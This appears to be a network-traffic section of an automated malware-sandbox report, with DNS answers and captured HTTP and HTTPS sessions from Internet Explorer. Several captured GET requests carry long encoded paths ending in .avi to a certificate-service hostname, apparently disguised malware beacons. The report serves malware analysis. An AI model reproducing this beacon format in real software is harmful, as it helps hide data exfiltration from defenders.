                                                                                                                                                                                                                                  DNS Answers

                                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:35.648479939 CEST8.8.8.8192.168.2.70x372bNo error (0)www.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:38.029557943 CEST8.8.8.8192.168.2.70x548bNo error (0)web.vortex.data.msn.comweb.vortex.data.microsoft.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:38.486430883 CEST8.8.8.8192.168.2.70xaeceNo error (0)geolocation.onetrust.com104.20.184.68A (IP address)IN (0x0001)
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:38.486430883 CEST8.8.8.8192.168.2.70xaeceNo error (0)geolocation.onetrust.com104.20.185.68A (IP address)IN (0x0001)
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:38.614166021 CEST8.8.8.8192.168.2.70x396fNo error (0)contextual.media.net23.211.6.95A (IP address)IN (0x0001)
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.015870094 CEST8.8.8.8192.168.2.70xb465No error (0)btloader.com172.67.70.134A (IP address)IN (0x0001)
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.015870094 CEST8.8.8.8192.168.2.70xb465No error (0)btloader.com104.26.7.139A (IP address)IN (0x0001)
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.015870094 CEST8.8.8.8192.168.2.70xb465No error (0)btloader.com104.26.6.139A (IP address)IN (0x0001)
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.468822956 CEST8.8.8.8192.168.2.70x406aNo error (0)ad.doubleclick.netdart.l.doubleclick.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.468822956 CEST8.8.8.8192.168.2.70x406aNo error (0)dart.l.doubleclick.net172.217.19.102A (IP address)IN (0x0001)
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.474426985 CEST8.8.8.8192.168.2.70x562eNo error (0)ad-delivery.net104.26.2.70A (IP address)IN (0x0001)
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.474426985 CEST8.8.8.8192.168.2.70x562eNo error (0)ad-delivery.net104.26.3.70A (IP address)IN (0x0001)
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.474426985 CEST8.8.8.8192.168.2.70x562eNo error (0)ad-delivery.net172.67.69.19A (IP address)IN (0x0001)
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:40.286279917 CEST8.8.8.8192.168.2.70x72a3No error (0)lg3.media.net23.211.6.95A (IP address)IN (0x0001)
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:41.183732033 CEST8.8.8.8192.168.2.70x9784No error (0)hblg.media.net23.211.6.95A (IP address)IN (0x0001)
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:42.033147097 CEST8.8.8.8192.168.2.70x5260No error (0)cvision.media.netcvision.media.net.edgekey.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:42.313369036 CEST8.8.8.8192.168.2.70x836dNo error (0)srtb.msn.comwww.msn.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:42.313369036 CEST8.8.8.8192.168.2.70x836dNo error (0)www.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.264920950 CEST8.8.8.8192.168.2.70xabbNo error (0)img.img-taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.264920950 CEST8.8.8.8192.168.2.70xabbNo error (0)tls13.taboola.map.fastly.net151.101.1.44A (IP address)IN (0x0001)
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.264920950 CEST8.8.8.8192.168.2.70xabbNo error (0)tls13.taboola.map.fastly.net151.101.65.44A (IP address)IN (0x0001)
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.264920950 CEST8.8.8.8192.168.2.70xabbNo error (0)tls13.taboola.map.fastly.net151.101.129.44A (IP address)IN (0x0001)
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.264920950 CEST8.8.8.8192.168.2.70xabbNo error (0)tls13.taboola.map.fastly.net151.101.193.44A (IP address)IN (0x0001)
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.282623053 CEST8.8.8.8192.168.2.70xceceNo error (0)s.yimg.comedge.gycpi.b.yahoodns.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.282623053 CEST8.8.8.8192.168.2.70xceceNo error (0)edge.gycpi.b.yahoodns.net87.248.118.23A (IP address)IN (0x0001)
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.282623053 CEST8.8.8.8192.168.2.70xceceNo error (0)edge.gycpi.b.yahoodns.net87.248.118.22A (IP address)IN (0x0001)
                                                                                                                                                                                                                                  Sep 10, 2021 11:12:31.067151070 CEST8.8.8.8192.168.2.70xa20dNo error (0)ocsp.sca1b.amazontrust.com13.225.29.191A (IP address)IN (0x0001)
                                                                                                                                                                                                                                  Sep 10, 2021 11:12:31.067151070 CEST8.8.8.8192.168.2.70xa20dNo error (0)ocsp.sca1b.amazontrust.com13.225.29.204A (IP address)IN (0x0001)
                                                                                                                                                                                                                                  Sep 10, 2021 11:12:31.067151070 CEST8.8.8.8192.168.2.70xa20dNo error (0)ocsp.sca1b.amazontrust.com13.225.29.132A (IP address)IN (0x0001)
                                                                                                                                                                                                                                  Sep 10, 2021 11:12:31.067151070 CEST8.8.8.8192.168.2.70xa20dNo error (0)ocsp.sca1b.amazontrust.com13.225.29.199A (IP address)IN (0x0001)
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:13.039644957 CEST8.8.8.8192.168.2.70x22deNo error (0)ocsp.sca1b.amazontrust.com13.225.29.191A (IP address)IN (0x0001)
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:13.039644957 CEST8.8.8.8192.168.2.70x22deNo error (0)ocsp.sca1b.amazontrust.com13.225.29.132A (IP address)IN (0x0001)
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:13.039644957 CEST8.8.8.8192.168.2.70x22deNo error (0)ocsp.sca1b.amazontrust.com13.225.29.204A (IP address)IN (0x0001)
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:13.039644957 CEST8.8.8.8192.168.2.70x22deNo error (0)ocsp.sca1b.amazontrust.com13.225.29.199A (IP address)IN (0x0001)
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:39.086754084 CEST8.8.8.8192.168.2.70xb3a2No error (0)ocsp.sca1b.amazontrust.com13.225.29.204A (IP address)IN (0x0001)
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:39.086754084 CEST8.8.8.8192.168.2.70xb3a2No error (0)ocsp.sca1b.amazontrust.com13.225.29.191A (IP address)IN (0x0001)
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:39.086754084 CEST8.8.8.8192.168.2.70xb3a2No error (0)ocsp.sca1b.amazontrust.com13.225.29.132A (IP address)IN (0x0001)
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:39.086754084 CEST8.8.8.8192.168.2.70xb3a2No error (0)ocsp.sca1b.amazontrust.com13.225.29.199A (IP address)IN (0x0001)
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:53.523144007 CEST8.8.8.8192.168.2.70x8f1dNo error (0)ocsp.sca1b.amazontrust.com13.225.29.191A (IP address)IN (0x0001)
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:53.523144007 CEST8.8.8.8192.168.2.70x8f1dNo error (0)ocsp.sca1b.amazontrust.com13.225.29.199A (IP address)IN (0x0001)
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:53.523144007 CEST8.8.8.8192.168.2.70x8f1dNo error (0)ocsp.sca1b.amazontrust.com13.225.29.132A (IP address)IN (0x0001)
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:53.523144007 CEST8.8.8.8192.168.2.70x8f1dNo error (0)ocsp.sca1b.amazontrust.com13.225.29.204A (IP address)IN (0x0001)

                                                                                                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                                                                                                  • https:
                                                                                                                                                                                                                                    • geolocation.onetrust.com
                                                                                                                                                                                                                                    • btloader.com
                                                                                                                                                                                                                                    • ad-delivery.net
                                                                                                                                                                                                                                    • ad.doubleclick.net
                                                                                                                                                                                                                                    • img.img-taboola.com
                                                                                                                                                                                                                                    • s.yimg.com
                                                                                                                                                                                                                                  • ocsp.sca1b.amazontrust.com

                                                                                                                                                                                                                                  HTTP Packets

                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                  0192.168.2.749722104.20.184.68443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                  1192.168.2.749741172.67.70.134443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                  10192.168.2.74993813.225.29.19180C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:53.557956934 CEST9349OUTGET /images/1mUl4vSxMxI/e7HhiI3PfruX2m/qXVt2BLImZpNU2AUWYoPx/KJXoqE51DtcFrNZ_/2BgDE50_2B2je1s/48lZWMnPdCpHd_2FFy/Vcq64rYip/9aN0bRvWizmkP5fXR2T3/jiHfK2wSGdTtZ8VP53I/SUMESuf_2FBQAkd3zXxfOT/_2BcxECgxKRoa/s8ZW5dhr/E0BgSy4u3Bh6HSi/j.avi HTTP/1.1
                                                                                                                                                                                                                                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                                                                                                                  Accept-Language: en-US
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                  Host: ocsp.sca1b.amazontrust.com
                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:53.630445957 CEST9350INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Content-Type: application/ocsp-response
                                                                                                                                                                                                                                  Content-Length: 5
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                  Cache-Control: public, max-age=300
                                                                                                                                                                                                                                  Date: Fri, 10 Sep 2021 09:13:53 GMT
                                                                                                                                                                                                                                  ETag: "5f457bf9-5"
                                                                                                                                                                                                                                  Last-Modified: Tue, 25 Aug 2020 21:00:41 GMT
                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                  X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                  Via: 1.1 d6561aeeccb210202cf78b99f07c5235.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                  X-Amz-Cf-Pop: CDG3-C2
                                                                                                                                                                                                                                  X-Amz-Cf-Id: Y2asqiIbkdpLT9kwUSjepiCbellJIyyeH7zilJnIOwH8uTto15iFhw==
                                                                                                                                                                                                                                  Data Raw: 30 03 0a 01 06
                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                  2192.168.2.749748104.26.2.70443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                  3192.168.2.749745172.217.19.102443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                  4192.168.2.749776151.101.1.44443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                  5192.168.2.749777151.101.1.44443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                  6192.168.2.74977987.248.118.23443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                  7192.168.2.749778151.101.1.44443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                  8192.168.2.74982413.225.29.19180C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                  Sep 10, 2021 11:12:31.213751078 CEST4515OUTGET /images/ljDNkkzbV4a6qGMM6/1HExUGmQXVwO/frwWBEjdrZ4/d5S8UlSiYa0DzX/el9J2qXVIUyYCxMHHr91X/kizLttMGapdo5SvF/olXlCBP7aPqDsmB/ICQ2HKBamF1i_2Fxdj/ZsDmjnqFK/ytn9Ymr2xJl5Qy4kiXVc/IQDWlUGPzShrNYAjXzf/JPSl_2BD7pWwAJFNY_2B0f/3A3oDAh_2BF9_/2BxYBJaFI/UpWol9RI.avi HTTP/1.1
                                                                                                                                                                                                                                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                                                                                                                  Accept-Language: en-US
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                  Host: ocsp.sca1b.amazontrust.com
                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                  Sep 10, 2021 11:12:31.288043022 CEST4516INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Content-Type: application/ocsp-response
                                                                                                                                                                                                                                  Content-Length: 5
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                  Cache-Control: public, max-age=300
                                                                                                                                                                                                                                  Date: Fri, 10 Sep 2021 09:12:31 GMT
                                                                                                                                                                                                                                  ETag: "5f4e9b09-5"
                                                                                                                                                                                                                                  Last-Modified: Tue, 01 Sep 2020 19:03:37 GMT
                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                  X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                  Via: 1.1 2be4364c1cde74eab64cab67d1de266a.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                  X-Amz-Cf-Pop: CDG3-C2
                                                                                                                                                                                                                                  X-Amz-Cf-Id: MAnAQl6oQ_k3rudXg0GsdUucATlJ8h94qmkZbcwfTFgp9-FzglyMjw==
                                                                                                                                                                                                                                  Data Raw: 30 03 0a 01 06
                                                                                                                                                                                                                                  Data Ascii: 0
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:28.241213083 CEST9339OUTGET /images/pHWWVyKJpE2g/nNZcTMutRbw/CCuOk7RvdVCDGz/STh4ftwA407S9VDDkvBy4/G7M_2BJ4E2bGBbf7/N4t3UKgsWntjM7M/mhCOIjxjlHyX4RUX7Q/Rdq3ib1hF/2fWqDSaJ9GA2yVZ_2Bgz/9iFlTX9OFyKHKxrjQJU/JYzhGNAUNkUKgLpHHU6bLf/nZUT_2BcMHeCkKwcWj/aMt.avi HTTP/1.1
                                                                                                                                                                                                                                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                                                                                                                  Accept-Language: en-US
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                  Host: ocsp.sca1b.amazontrust.com
                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:28.532047033 CEST9340INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Content-Type: application/ocsp-response
                                                                                                                                                                                                                                  Content-Length: 5
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                  Cache-Control: public, max-age=300
                                                                                                                                                                                                                                  Date: Fri, 10 Sep 2021 09:13:28 GMT
                                                                                                                                                                                                                                  ETag: "5fac0ccd-5"
                                                                                                                                                                                                                                  Last-Modified: Wed, 11 Nov 2020 16:09:49 GMT
                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                  X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                  Via: 1.1 2be4364c1cde74eab64cab67d1de266a.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                  X-Amz-Cf-Pop: CDG3-C2
                                                                                                                                                                                                                                  X-Amz-Cf-Id: Hxf_sKJ3QnNKAKWf4poB6n0NLhGcqxRChXoaoe_aJ8EDSwQu5tW5Ww==
                                                                                                                                                                                                                                  Data Raw: 30 03 0a 01 06
                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                  9192.168.2.74988713.225.29.19180C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:13.069914103 CEST8413OUTGET /images/cCdYQdt2tX8RhHk/neYfmVtOu_2BWHOxaX/ecV9VJIhq/XE4M5D_2FzTYipgQVzFy/24_2BtaWyVjXI2M_2FX/wa66wgzPqWCXC0kGRqyEUL/snesyfGZeTgvJ/569YwYUH/U86MzznZ70JhRKq9sWcaTd1/Hzb_2FFW0u/GZ5sESPD_2B5JLMQh/7K5kxREyrQ1n/mKmdzEvi70Tv5/6xorN.avi HTTP/1.1
                                                                                                                                                                                                                                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                                                                                                                  Accept-Language: en-US
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                  Host: ocsp.sca1b.amazontrust.com
                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:13.362699986 CEST8414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Content-Type: application/ocsp-response
                                                                                                                                                                                                                                  Content-Length: 5
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                  Cache-Control: public, max-age=300
                                                                                                                                                                                                                                  Date: Fri, 10 Sep 2021 09:13:13 GMT
                                                                                                                                                                                                                                  ETag: "5fac0ccd-5"
                                                                                                                                                                                                                                  Last-Modified: Wed, 11 Nov 2020 16:09:49 GMT
                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                  X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                  Via: 1.1 8513b0b4c77c9a98d13a007d589042ff.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                  X-Amz-Cf-Pop: CDG3-C2
                                                                                                                                                                                                                                  X-Amz-Cf-Id: RxQRFlS4KfsoP9UGBcMybusB3Bs7Tpc7zJpb7ocQOWv42p9ezWXwrg==
                                                                                                                                                                                                                                  Data Raw: 30 03 0a 01 06
                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                  HTTPS Proxied Packets

                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                  0192.168.2.749722104.20.184.68443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                  2021-09-10 09:11:38 UTC0OUTGET /cookieconsentpub/v1/geo/location HTTP/1.1
                                                                                                                                                                                                                                  Accept: application/javascript, */*;q=0.8
                                                                                                                                                                                                                                  Referer: https://www.msn.com/de-ch/?ocid=iehp
                                                                                                                                                                                                                                  Accept-Language: en-US
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                  Host: geolocation.onetrust.com
                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                  2021-09-10 09:11:38 UTC0INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Date: Fri, 10 Sep 2021 09:11:38 GMT
                                                                                                                                                                                                                                  Content-Type: text/javascript
                                                                                                                                                                                                                                  Content-Length: 182
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                  CF-RAY: 68c787b23fe597f6-FRA
                                                                                                                                                                                                                                  2021-09-10 09:11:38 UTC0INData Raw: 6a 73 6f 6e 46 65 65 64 28 7b 22 63 6f 75 6e 74 72 79 22 3a 22 43 48 22 2c 22 73 74 61 74 65 22 3a 22 5a 48 22 2c 22 73 74 61 74 65 4e 61 6d 65 22 3a 22 5a 75 72 69 63 68 22 2c 22 7a 69 70 63 6f 64 65 22 3a 22 38 31 35 32 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 45 75 72 6f 70 65 2f 5a 75 72 69 63 68 22 2c 22 6c 61 74 69 74 75 64 65 22 3a 22 34 37 2e 34 33 30 30 30 22 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 22 38 2e 35 37 31 38 30 22 2c 22 63 69 74 79 22 3a 22 5a 75 72 69 63 68 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 22 3a 22 45 55 22 7d 29 3b
                                                                                                                                                                                                                                  Data Ascii: jsonFeed({"country":"CH","state":"ZH","stateName":"Zurich","zipcode":"8152","timezone":"Europe/Zurich","latitude":"47.43000","longitude":"8.57180","city":"Zurich","continent":"EU"});


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                  1192.168.2.749741172.67.70.134443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                  2021-09-10 09:11:39 UTC0OUTGET /tag?o=6208086025961472&upapi=true HTTP/1.1
                                                                                                                                                                                                                                  Accept: application/javascript, */*;q=0.8
                                                                                                                                                                                                                                  Referer: https://www.msn.com/de-ch/?ocid=iehp
                                                                                                                                                                                                                                  Accept-Language: en-US
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                  Host: btloader.com
                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                  2021-09-10 09:11:39 UTC1INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Date: Fri, 10 Sep 2021 09:11:39 GMT
                                                                                                                                                                                                                                  Content-Type: application/javascript
                                                                                                                                                                                                                                  Content-Length: 10055
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Cache-Control: public, max-age=1800, must-revalidate
                                                                                                                                                                                                                                  Etag: "9e65f2af141ca0a7e5ebc06696b0cdb5"
                                                                                                                                                                                                                                  Vary: Origin
                                                                                                                                                                                                                                  Via: 1.1 google
                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                  Age: 210
                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                  Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9OQbtRbhsekuSTqtBAfXn7cRxoAWY574NwKeDpvxwZQn9Z%2BFaV8pLOfex2cO9O8deBy2BcUbCBB7y%2FSt6kfm3WomDfDUfg37bLhkdFPMjZsxY8h7acu7RBGgyahbOg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                  CF-RAY: 68c787b5a9d14e37-FRA
                                                                                                                                                                                                                                  2021-09-10 09:11:39 UTC1INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 72 28 65 2c 69 2c 63 2c 6c 29 7b 72 65 74 75 72 6e 20 6e 65 77 28 63 3d 63 7c 7c 50 72 6f 6d 69 73 65 29 28 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 29 7b 66 75 6e 63 74 69 6f 6e 20 6f 28 65 29 7b 74 72 79 7b 72 28 6c 2e 6e 65 78 74 28 65 29 29 7d 63 61 74 63 68 28 65 29 7b 74 28 65 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 29 7b 74 72 79 7b 72 28 6c 2e 74 68 72 6f 77 28 65 29 29 7d 63 61 74 63 68 28 65 29 7b 74 28 65 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 72 28 65 29 7b 76 61 72 20 74 3b 65 2e 64 6f 6e 65 3f 6e 28 65 2e 76 61 6c 75 65 29 3a 28 28 74 3d 65 2e 76 61 6c 75 65 29 69 6e 73 74 61 6e 63 65 6f 66 20 63 3f 74 3a 6e 65 77 20 63 28 66 75 6e 63 74 69 6f
                                                                                                                                                                                                                                  Data Ascii: !function(){"use strict";function r(e,i,c,l){return new(c=c||Promise)(function(n,t){function o(e){try{r(l.next(e))}catch(e){t(e)}}function a(e){try{r(l.throw(e))}catch(e){t(e)}}function r(e){var t;e.done?n(e.value):((t=e.value)instanceof c?t:new c(functio
                                                                                                                                                                                                                                  2021-09-10 09:11:39 UTC2INData Raw: 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 61 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 47 65 6e 65 72 61 74 6f 72 20 69 73 20 61 6c 72 65 61 64 79 20 65 78 65 63 75 74 69 6e 67 2e 22 29 3b 66 6f 72 28 3b 63 3b 29 74 72 79 7b 69 66 28 61 3d 31 2c 72 26 26 28 69 3d 32 26 74 5b 30 5d 3f 72 2e 72 65 74 75 72 6e 3a 74 5b 30 5d 3f 72 2e 74 68 72 6f 77 7c 7c 28 28 69 3d 72 2e 72 65 74 75 72 6e 29 26 26 69 2e 63 61 6c 6c 28 72 29 2c 30 29 3a 72 2e 6e 65 78 74 29 26 26 21 28 69 3d 69 2e 63 61 6c 6c 28 72 2c 74 5b 31 5d 29 29 2e 64 6f 6e 65 29 72 65 74 75 72 6e 20 69 3b 73 77 69 74 63 68 28 72 3d 30 2c 69 26 26 28 74 3d 5b 32 26 74 5b 30 5d 2c 69 2e 76 61 6c 75 65
                                                                                                                                                                                                                                  Data Ascii: eturn function(e){return function(t){if(a)throw new TypeError("Generator is already executing.");for(;c;)try{if(a=1,r&&(i=2&t[0]?r.return:t[0]?r.throw||((i=r.return)&&i.call(r),0):r.next)&&!(i=i.call(r,t[1])).done)return i;switch(r=0,i&&(t=[2&t[0],i.value
